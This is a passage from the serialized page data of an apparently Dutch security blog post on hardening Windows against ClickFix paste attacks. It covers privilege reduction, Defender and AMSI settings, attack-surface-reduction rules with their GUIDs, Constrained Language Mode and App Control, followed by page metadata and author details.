blokkeren",[526,876,565],{},[526,878,879],{},"Breng voor de gevorderde features de grondbeginselen in orde. Voor ClickFix betekent dat:",[831,881,834,882,834,888,834,894,834,900],{"style":833},[836,883,884,887],{},[839,885,886],{},"Local admin reduction:"," lokale administratorrechten waar mogelijk bij eindgebruikers verwijderen om de werking van een code-uitvoering te beperken.",[836,889,890,893],{},[839,891,892],{},"Endpoint Privilege Management (EPM):"," gebruikers als standaardgebruiker laten werken en alleen goedgekeurde apps via policyregels eleveren.",[836,895,896,899],{},[839,897,898],{},"UAC-hardening:"," secure-desktop-enforcement, promptgedrag voor admins en standaardgebruikers en installerdetectie controleren.",[836,901,902,905],{},[839,903,904],{},"Credential Guard:"," NTLM-hashes, Kerberos-tickets en overig credentialmateriaal via op virtualisatie gebaseerde beveiliging isoleren, zodat credentialdiefstal moeilijk blijft, zelfs wanneer een aanvaller adminrechten verkrijgt.",[526,907,908],{},"Deze controls beperken escalatiemogelijkheden, beschermen credentials en dwingen least privilege af. De grens daarbij: ze begrenzen wat er na een compromittering gebeurt. Ze houden een infostealer in de standaardgebruikerscontext er niet van af om voor de gebruiker leesbare cookies, sessietokens en app-credentialstores uit te lezen.",[526,910,911],{},"Dan Microsoft Defender. Defender AV kan de payload van de tweede stap detecteren, maar alleen met de juiste instellingen: cloud protection aanzetten en het beschermingsniveau op High of High+ zetten. AMSI, het Antimalware Scan Interface, laat applicaties inhoud tijdens runtime aan Defender doorgeven ter controle, nadat die in het geheugen is ontsleuteld of gedeobfusceerd, maar voordat die wordt uitgevoerd. PowerShell gebruikt AMSI om schadelijke code te identificeren, en AMSI heeft realtimebescherming en behavior monitoring nodig.",[526,913,914],{},"Minstens vijf attack-surface-reduction-regels zijn relevant tegen ClickFix:",[597,916,918],{"style":917},"margin: 0.5rem 0 2rem; overflow-x: auto",[919,920,834,922,834,941],"table",{"style":921},"width:100%; border-collapse: collapse; font-size: 0.85rem",[923,924,925,926,834],"thead",{},"\n    ",[927,928,929,930,929,935,929,938,925],"tr",{},"\n      ",[931,932,934],"th",{"style":933},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Regel",[931,936,937],{"style":933},"GUID",[931,939,940],{"style":933},"ClickFix-relevantie",[942,943,925,944,925,960,925,975,925,988,925,1001,834],"tbody",{},[927,945,929,946,929,951,929,957,925],{},[947,948,950],"td",{"style":949},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Uitvoering van potentieel versluierde scripts blokkeren",[947,952,954],{"style":953},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa; white-space: nowrap",[580,955,956],{},"5beb7efe-fd9a-4556-801d-275e5ffc04cc",[947,958,959],{"style":949},"Versluierde of gecodeerde scripts in de uitvoerings- en evasiefase",[927,961,929,962,929,966,929,972,925],{},[947,963,965],{"style":964},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","JavaScript of VBScript verhinderen gedownloade uitvoerbare inhoud te starten",[947,967,969],{"style":968},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff; white-space: nowrap",[580,970,971],{},"d3e037e1-3eb8-44c8-a917-57927947596d",[947,973,974],{"style":964},"WSH, .js of .vbs die gedownloade payloads starten",[927,976,929,977,929,980,929,985,925],{},[947,978,979],{"style":949},"Uitvoerbare bestanden alleen toestaan bij een prevalentie-, ouderdoms- of trusted-list-criterium",[947,981,982],{"style":953},[580,983,984],{},"01443614-cd74-433a-b99e-2ecdc07bfc25",[947,986,987],{"style":949},"Verse of zeldzame neergezette executables",[927,989,929,990,929,993,929,998,925],{},[947,991,992],{"style":964},"Uitvoerbare inhoud uit e-mailclient en webmail blokkeren",[947,994,995],{"style":968},[580,996,997],{},"be9ba2d9-53ea-4cdc-84e5-9b1eeee46550",[947,999,1000],{"style":964},"Via e-mail bezorgde ClickFix-varianten",[927,1002,929,1003,929,1006,929,1011,925],{},[947,1004,1005],{"style":949},"Alle Office-applicaties verhinderen kindprocessen te creëren",[947,1007,1008],{"style":953},[580,1009,1010],{},"d4f940ab-401b-4efc-aadc-ad5f3c50688a",[947,1012,1013],{"style":949},"Office-lokaasvarianten die interpreters starten",[526,1015,1016],{},"Rol ASR eerst in de auditmodus uit, dan als pilot, dan in de blokmodus. Tamper Protection is de laatste lijn: ze verhindert de aanvaller jullie detecties uit te schakelen.",[526,1018,1019],{},"Bij PowerShell zelf beperken jullie het risico door legacy interpreters. Identificeer en verwijder, waar haalbaar, Windows PowerShell 2.0 en legacy VBScript-componenten, waaraan de logging- en securityfeatures van nieuwere versies ontbreken. De volgende stap is de Constrained Language Mode (CLM), die de beschikbare taalelementen van PowerShell inperkt en veel scriptgebaseerde technieken blokkeert. CLM heeft alleen dan robuuste beveiligingswaarde wanneer een system application control policy hem afdwingt (App Control for Business); de varianten via omgevingsvariabele en AppLocker zijn zwakker en omzeilbaar. En veel systemen hebben de Full Language Mode nodig om te functioneren, zoals software-deployment-tooling, waardoor CLM vaak alleen in geselecteerde omgevingen haalbaar is.",[526,1021,1022],{},"Daarmee zijn we bij App Control for Business (voorheen WDAC). App Control dwingt een code-integriteitspolicy af over welke executables, scripts en drivers mogen draaien. De strategische houding is default-deny plus Microsofts aanbevolen block rules, de bekende LOLBin- en bypass-blokkeerlijst. App Control is ook het correcte enforcementpad voor de PowerShell-CLM. De script enforcement blokkeert MSHTA- en MSXML-scripthosts, dwingt PowerShell in de CLM en blokkeert niet-toegestane inzet van de Windows Script Host. Een paar gedragsfeiten zijn belangrijk:",[831,1024,834,1025,834,1028,834,1031],{"style":833},[836,1026,1027],{},"Base policies die Windows vertrouwen, blokkeren vertrouwde LOLBins niet automatisch. Jullie moeten Microsofts aanbevolen block rules inmergen om de bekende bypasses te sluiten.",[836,1029,1030],{},"App Control verhindert het starten van gesigneerde powershell.exe of cmd.exe niet. Het perkt in wat ze mogen doen (CLM, geen ongesigneerde of niet-toegestane payload) en regelt niet de inhoud van cmd.exe, .bat of .cmd. Daarom wordt het met ASR en launch-hardening gelaagd, niet alleen ingezet.",[836,1032,1033],{},"De auditmodus is niet neutraal: de script enforcement blokkeert ook in de audit de uitvoering van MSHTA en MSXML en kan het PowerShell-CLM-gedrag veranderen. Daarom moet App Control in de audit vanaf de eerste uitrol pilot- of ringbegrensd zijn, nooit vlootbreed.",[526,1035,1036],{},"App Control is de afzonderlijke control met de hoogste confidence tegen de interpreter-, LOLBin- en payload-uitvoeringsfasen en dwingt robuuste CLM af. Het draagt tegelijk de hoogste deploymentcomplexiteit en het hoogste rollbackrisico, want een misconfiguratie blokkeert de uitvoering. Voer het in via gecontroleerde pilotringen.",[559,1038,1040],{"id":1039},"waar-wij-in-het-spel-komen","Waar wij in het spel komen",[526,1042,565],{},[526,1044,1045,1046,811],{},"ClickFix is snel, en Microsofts native detecties dekken het meeste af, maar niet alles. Voor onze CSOC-klanten breiden we de dekking doorlopend uit waar gaten opduiken: uitvoering via Windows Terminal, RAT-gedreven supportscams en post-compromise-gedrag. Als jullie willen weten waar jullie omgeving staat, ",[1047,1048,1049],"a",{"href":276},"laat het ons weten",[1051,1052,1053],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":530,"searchDepth":531,"depth":531,"links":1055},[1056,1057,1058,1059,1060,1061,1062,1063,1064],{"id":561,"depth":531,"text":562},{"id":643,"depth":531,"text":644},{"id":655,"depth":531,"text":656},{"id":678,"depth":531,"text":679},{"id":790,"depth":531,"text":791},{"id":820,"depth":531,"text":821},{"id":857,"depth":531,"text":858},{"id":873,"depth":531,"text":874},{"id":1039,"depth":531,"text":1040},"post",{"lang":1067,"seoTitle":1068,"titleClass":1069,"date":1070,"categories":1071,"blogtitlepic":1072,"socialimg":1073,"customExcerpt":1074,"keywords":1075,"asideNav":1076,"published":325},"nl","ClickFix-aanvallen detecteren en verhinderen: de Win+R-paste-truc","h2-font-size","2026-09-21",[235],"head-clickfix.jpg","/blog/heads/head-clickfix.jpg","ClickFix maakt gebruikers tot hun eigen aanvaller: een vals CAPTCHA, een copy-paste, en schadelijke code draait in het geheugen zonder dat er iets op de schijf landt. Hoe Microsoft Defender de aanval detecteert, waar de detectie tegen grenzen aanloopt en hoe jullie het gat dichten met een RunMRU-hunt en vier beschermingslagen.","ClickFix, ClickFix-aanval, ClickFix-detectie, ClickFix verhinderen, vals CAPTCHA, Win+R-aanval, RunMRU KQL, Microsoft Defender, Attack Surface Reduction, ASR-regels, App Control for Business, WDAC, Constrained Language Mode, Network Protection, AMSI, Endpoint Privilege Management, infostealer, LOLBin, PowerShell-hardening",{"menuItems":1077},[1078,1081,1084,1087,1090,1093,1096,1099,1102],{"href":1079,"text":1080},"#de-clickfix-aanvalsketen","De aanvalsketen",{"href":1082,"text":1083},"#wat-microsoft-defender-detecteert","Wat Defender detecteert",{"href":1085,"text":1086},"#waar-de-native-detectie-tegen-haar-grenzen-aanloopt","Waar het knelt",{"href":1088,"text":1089},"#het-gat-dichten-een-runmru-hunt","Het gat dichten",{"href":1091,"text":1092},"#beschermingslaag-1-de-bezorging-blokkeren","Laag 1: bezorging",{"href":1094,"text":1095},"#beschermingslaag-2-de-truc-blokkeren","Laag 2: de truc",{"href":1097,"text":1098},"#beschermingslaag-3-de-actie-blokkeren","Laag 3: de actie",{"href":1100,"text":1101},"#beschermingslaag-4-de-uitvoering-blokkeren","Laag 4: uitvoering",{"href":1103,"text":1040},"#waar-wij-in-het-spel-komen","/posts/2026-09-21-clickfix-prevent-detect",{"title":553,"description":530},"posts/2026-09-21-clickfix-prevent-detect",[1108,1109,1110],"Defender","SOC","Endpoint Security","lS01fik3j3PA11SfFEubOmZbcX5CpsIRGptr_n3mheA",[],{"id":1114,"extension":1115,"meta":1116,"stem":8,"__hash__":1126},"authors_data/authors.json","json",{"Fritz Zurhorst":1117,"Nadine Klein":1122},{"display_name":555,"avatar":1118,"permalink":1119,"linkedin":1120,"imageOffsetTop":1121},"people/people-fritz-zurhorst.png","/authors/fritz-zurhorst","friedemann-z","72%",{"display_name":535,"avatar":1123,"permalink":1124,"twitter":1125,"linkedin":548,"imageOffsetTop":1121},"people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","1csawlkJxRljy93GTOnXEkwLqAv9Lcj-apxRvoodAOY",1791383984331]